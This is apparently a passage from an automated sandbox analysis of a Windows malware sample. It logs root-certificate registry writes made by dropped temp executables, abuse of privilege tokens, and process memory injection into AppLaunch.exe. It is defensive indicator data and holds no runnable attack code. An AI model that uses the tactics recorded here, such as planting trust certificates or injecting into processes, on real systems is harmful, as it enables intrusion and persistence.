423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\20D3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\20D3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\20D3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\20D3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1BA4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1BA4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\11A4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\20D3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\bcdedit.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1864 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 1864 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 1864 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 1864 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 1184 wrote to memory of 2748 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9398.exe
PID 1184 wrote to memory of 2748 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9398.exe
PID 1184 wrote to memory of 2748 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9398.exe
PID 1184 wrote to memory of 2748 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9398.exe
PID 1184 wrote to memory of 2748 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9398.exe
PID 1184 wrote to memory of 2748 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9398.exe
PID 1184 wrote to memory of 2748 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9398.exe
PID 1184 wrote to memory of 2580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\956D.exe
PID 1184 wrote to memory of 2580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\956D.exe
PID 1184 wrote to memory of 2580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\956D.exe
PID 1184 wrote to memory of 2580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\956D.exe
PID 2748 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\9398.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 2748 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\9398.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 2748 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\9398.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
